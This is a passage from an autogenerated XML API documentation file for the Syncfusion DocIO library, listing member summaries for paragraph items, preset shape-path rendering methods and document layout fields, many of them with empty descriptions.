        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.ApplyCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Sets the character format.
            </summary>
            <param name="charFormat">The character format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.CloneImpl">
            <summary>
            Clones itself.
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.CreateLayoutInfo">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos">The item pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.Detach">
            <summary>
            Detaches itself
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.UpdateXmlParts(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates the XML parts.
            </summary>
            <param name="destination">The destination.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.UpdateXmlPartContainer(Syncfusion.DocIO.DLS.Package,Syncfusion.DocIO.DLS.PartContainer,Syncfusion.DocIO.DLS.PartContainer,System.String[],System.Int32)">
            <summary>
            Updates the XML part container.
            </summary>
            <param name="srcPackage">The SRC package.</param>
            <param name="srcContainer">The SRC container.</param>
            <param name="destContainer">The dest container.</param>
            <param name="parts">The parts.</param>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XmlParagraphItem.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlParagraphItem.ImageRelations">
            <summary>
            Gets the image relations.
            </summary>
            <value>The image relations.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlParagraphItem.Relations">
            <summary>
            Gets the relations.
            </summary>
            <value>The relations.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlParagraphItem.DataNode">
            <summary>
            Gets the data node.
            </summary>
            <value>The data node.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlParagraphItem.CharacterFormat">
            <summary>
            Gets the character format.
            </summary>
            <value>The character format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlParagraphItem.ZOrderIndex">
            <summary>
            Gets or sets the ZorderIndex
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XmlParagraphItem.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="F:Syncfusion.DocIO.Rendering.ShapePath._rectBounds">
             <summary>
            
             </summary>
        </member>
        <member name="F:Syncfusion.DocIO.Rendering.ShapePath._shapeGuide">
             <summary>
            
             </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.#ctor(System.Drawing.RectangleF,System.Collections.Generic.Dictionary{System.String,System.String})">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCurvedConnectorPath">
            <summary>
            Get Curved Connector path
            </summary>
            <formula>
            formulaColl.Add("x2","*/ w adj1 100000");
            formulaColl.Add("x1","+/ l x2 2");
            formulaColl.Add("x3","+/ r x2 2");
            formulaColl.Add("y3","*/ h 3 4");
            </formula>
            <param name="m_rectBounds"></param>
            <param name="m_shapeGuide"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetBentConnectorPath">
            <summary>
            Get Bent Connector path
            </summary>
            <formula>
            formulaColl.Add("x1","*/ w adj1 100000");
            </formula>>
            <param name="m_rectBounds"></param>
            <param name="m_shapeGuide"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRoundedRectanglePath">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetSnipSingleCornerRectanglePath">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetSnipSameSideCornerRectanglePath">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetSnipDiagonalCornerRectanglePath">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetSnipAndRoundSingleCornerRectanglePath">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRoundSingleCornerRectanglePath">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRoundSameSideCornerRectanglePath">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRoundDiagonalCornerRectanglePath">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="m_shapeGuide"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetTrianglePath">
            <summary>
            Get Triangle path
            </summary>
            <param name="shapeType"></param>
            <param name="m_rectBounds"></param>
            <param name="m_shapeGuide"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetParallelogramPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetTrapezoidPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRegularPentagonPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetHexagonPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetHeptagonPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetOctagonPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDecagonPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDodecagonPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetPiePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetChordPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetTearDropPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFramePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetHalfFramePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetL_ShapePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDiagonalStripePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCrossPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetPlaquePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCanPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCubePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetBevelPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDonutPath(System.Double)">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetNoSymbolPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetBlockArcPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFoldedCornerPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetSmileyFacePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetHeartPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLightningBoltPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetSunPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetMoonPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCloudPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetArcPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDoubleBracketPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDoubleBracePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLeftBracketPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRightBracketPath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLeftBracePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRightBracePath">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRightArrowPath">
            <summary>
            Gets the right arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLeftArrowPath">
            <summary>
            Gets the left arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDownArrowPath">
            <summary>
            Gets down arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLeftRightArrowPath">
            <summary>
            Gets the left right arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCurvedRightArrowPath">
            <summary>
            Gets the curved right arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCurvedLeftArrowPath">
            <summary>
            Gets the curved left arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCurvedUpArrowPath">
            <summary>
            Gets the curved up arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCurvedDownArrowPath">
            <summary>
            Gets the curved down arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetUpDownArrowPath">
            <summary>
            Gets up down arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetQuadArrowPath">
            <summary>
            Gets the quad arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLeftRightUpArrowPath">
            <summary>
            Gets the left right up arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetBentArrowPath">
            <summary>
            Gets the bent arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetUTrunArrowPath">
            <summary>
            Gets the U trun arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLeftUpArrowPath">
            <summary>
            Gets the left up arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetBentUpArrowPath">
            <summary>
            Gets the bent up arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetStripedRightArrowPath">
            <summary>
            Gets the striped right arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetNotchedRightArrowPath">
            <summary>
            Gets the notched right arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetPentagonPath">
            <summary>
            Gets the pentagon path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetChevronPath">
            <summary>
            Gets the chevron path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRightArrowCalloutPath">
            <summary>
            Gets the right arrow callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDownArrowCalloutPath">
            <summary>
            Gets down arrow callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLeftArrowCalloutPath">
            <summary>
            Gets the left arrow callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetUpArrowCalloutPath">
            <summary>
            Gets up arrow callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLeftRightArrowCalloutPath">
            <summary>
            Gets the left right arrow callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetQuadArrowCalloutPath">
            <summary>
            Gets the quad arrow callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCircularArrowPath">
            <summary>
            Gets the circular arrow path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetMathPlusPath">
            <summary>
            Gets the math plus path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetMathMinusPath">
            <summary>
            Gets the math minus path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetMathMultiplyPath">
            <summary>
            Gets the math multiply path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetMathDivisionPath">
            <summary>
            Gets the math division path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetMathEqualPath">
            <summary>
            Gets the math equal path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetMathNotEqualPath">
            <summary>
            Gets the math not equal path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartAlternateProcessPath">
            <summary>
            Gets the flow chart alternate process path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartPredefinedProcessPath">
            <summary>
            Gets the flow chart predefined process path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartInternalStoragePath">
            <summary>
            Gets the flow chart internal storage path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartDocumentPath">
            <summary>
            Gets the flow chart document path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartMultiDocumentPath">
            <summary>
            Gets the flow chart multi document path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartTerminatorPath">
            <summary>
            Gets the flow chart terminator path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartPreparationPath">
            <summary>
            Gets the flow chart preparation path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartManualInputPath">
            <summary>
            Gets the flow chart manual input path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartManualOperationPath">
            <summary>
            Gets the flow chart manual operation path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartConnectorPath">
            <summary>
            Gets the flow chart connector path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartOffPageConnectorPath">
            <summary>
            Gets the flow chart off page connector path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartCardPath">
            <summary>
            Gets the flow chart card path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartPunchedTapePath">
            <summary>
            Gets the flow chart punched tape path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartSummingJunctionPath">
            <summary>
            Gets the flow chart summing junction path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartOrPath">
            <summary>
            Gets the flow chart or path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartCollatePath">
            <summary>
            Gets the flow chart collate path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartSortPath">
            <summary>
            Gets the flow chart sort path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartExtractPath">
            <summary>
            Gets the flow chart extract path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartMergePath">
            <summary>
            Gets the flow chart merge path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartOnlineStoragePath">
            <summary>
            Gets the flow chart online storage path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartDelayPath">
            <summary>
            Gets the flow chart delay path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartSequentialAccessStoragePath">
            <summary>
            Gets the flow chart sequential access storage path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartMagneticDiskPath">
            <summary>
            Gets the flow chart magnetic disk path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartDirectAccessStoragePath">
            <summary>
            Gets the flow chart direct access storage path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFlowChartDisplayPath">
            <summary>
            Gets the flow chart display path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRectangularCalloutPath">
            <summary>
            Gets the rectangular callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetRoundedRectangularCalloutPath">
            <summary>
            Gets the rounded rectangular callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetOvalCalloutPath">
            <summary>
            Gets the oval callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetCloudCalloutPath">
            <summary>
            Gets the cloud callout path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout1Path">
            <summary>
            Gets the line callout1 path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout2Path">
            <summary>
            Gets the line callout2 path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout3Path">
            <summary>
            Gets the line callout3 path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout1AccentBarPath">
            <summary>
            Gets the line callout1 accent bar path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout2AccentBarPath">
            <summary>
            Gets the line callout2 accent bar path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout3AccentBarPath">
            <summary>
            Gets the line callout3 accent bar path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout1NoBorderPath">
            <summary>
            Gets the line callout1 no border path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout2NoBorderPath">
            <summary>
            Gets the line callout2 no border path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout3NoBorderPath">
            <summary>
            Gets the line callout3 no border path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout1BorderAndAccentBarPath">
            <summary>
            Gets the line callout1 border and accent bar path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout2BorderAndAccentBarPath">
            <summary>
            Gets the line callout2 border and accent bar path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetLineCallout3BorderAndAccentBarPath">
            <summary>
            Gets the line callout3 border and accent bar path.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDegreeValue(System.Single)">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetXYPosition(System.Single,System.Single,System.Single)">
             <summary>
            
             </summary>
             <param name="xDifference"></param>
             <param name="yDifference"></param>
             <param name="positionRatio"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetPathAdjustValue(Syncfusion.DocIO.DLS.AutoShapeType)">
            <summary>
            Get Path adjust value
            </summary>
            <param name="m_shapeGuide"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.ParseShapeFormula(Syncfusion.DocIO.DLS.AutoShapeType)">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="adjValue"></param>
             <param name="formulaColl"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetFormulaValues(Syncfusion.DocIO.DLS.AutoShapeType,System.Collections.Generic.Dictionary{System.String,System.String},System.Boolean)">
             <summary>
            
             </summary>
             <param name="formulaColl"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetOperandValues(Syncfusion.DocIO.DLS.AutoShapeType,System.Collections.Generic.Dictionary{System.String,System.Single}@,System.String[],System.Boolean)">
             <summary>
            
             </summary>
             <param name="m_rectBounds"></param>
             <param name="adjValues"></param>
             <param name="formulaValues"></param>
             <param name="splitFormula"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetPresetOperandValue(System.String)">
             <summary>
            
             </summary>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetResultValue(System.String,System.Single[])">
             <summary>
            
             </summary>
             <param name="formula"></param>
             <param name="operandValues"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetShapeFormula(Syncfusion.DocIO.DLS.AutoShapeType)">
             <summary>
            
             </summary>
             <param name="shapeType"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.ShapePath.GetDefaultPathAdjValues(Syncfusion.DocIO.DLS.AutoShapeType)">
             <summary>
            
             </summary>
             <param name="shapeType"></param>
             <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.ILayoutProcessHandler">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.ILayoutProcessHandler.GetNextArea(System.Drawing.RectangleF@,System.Int32@,System.Boolean@,System.Boolean,System.Single@,System.Boolean,Syncfusion.Layouting.IWidgetContainer@)">
            <summary>
            Gets the next free area.
            </summary>
            <param name="rect">The rectangle of allowed area.</param>
            <param name="isContinuousSection">The isContinuousSection.</param>
            <returns>True if area allowed, else False</returns>
        </member>
        <member name="M:Syncfusion.Layouting.ILayoutProcessHandler.PushLayoutedWidget(Syncfusion.Layouting.LayoutedWidget,System.Drawing.RectangleF,System.Boolean,System.Boolean,Syncfusion.Layouting.LayoutState,System.Boolean)">
            <summary>
            Pushes the LayoutedWidget to external holder.
            </summary>
            <param name="ltWidget">The LayoutedWidget.</param>
        </member>
        <member name="M:Syncfusion.Layouting.ILayoutProcessHandler.HandleSplittedWidget(Syncfusion.Layouting.SplitWidgetContainer,Syncfusion.Layouting.LayoutState,Syncfusion.Layouting.LayoutedWidget,System.Boolean@)">
            <summary>
            Handles the splitted widget.
            </summary>
            <param name="stWidgetContainer">The splitted widget container.</param>
            <param name="state">The current state of layout context.</param>
            <param name="ltWidget">The LayoutedWidget.</param>
            <param name="isLayoutedWidgetNeedToPushed">The isLayoutedWidgetNeedToPushed.</param>
            <returns>True for continue layout process, False - for stopping</returns>
        </member>
        <member name="M:Syncfusion.Layouting.ILayoutProcessHandler.HandleLayoutedWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Handle the LayoutedWidget to external holder.
            </summary>
            <param name="ltWidget">The LayoutedWidget.</param>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_bisNeedToRestartFootnote">
            <summary>
            Specifies whether the footnote need to be restart for each page
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_bisNeedToRestartEndnote">
            <summary>
            Specifies whether the endnote need to be restart for each section
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_footnoteCount">
            <summary>
            Specifies the footnote count in each columns
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_endnoteCount">
            <summary>
            Specifies the Endnote count in each columns
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_usedHeight">
            <summary>
            Height used in current page
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_clientHeight">
            <summary>
            Page Client height 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_totalHeight">
            <summary>
            Total height layouted by the section
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_sectionFixedHeight">
            <summary>
            Fixed height for the continuous section
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_pageTop">
            <summary>
            Current page top
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_sectionIndex">
            <summary>
            Current section index
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_isFirstPage">
            <summary>
            Is first page of the document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_sectionNewPage">
            <summary>
            Is new page created for current section
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_createNewPage">
            <summary>
            Need to create new page
            </summary>
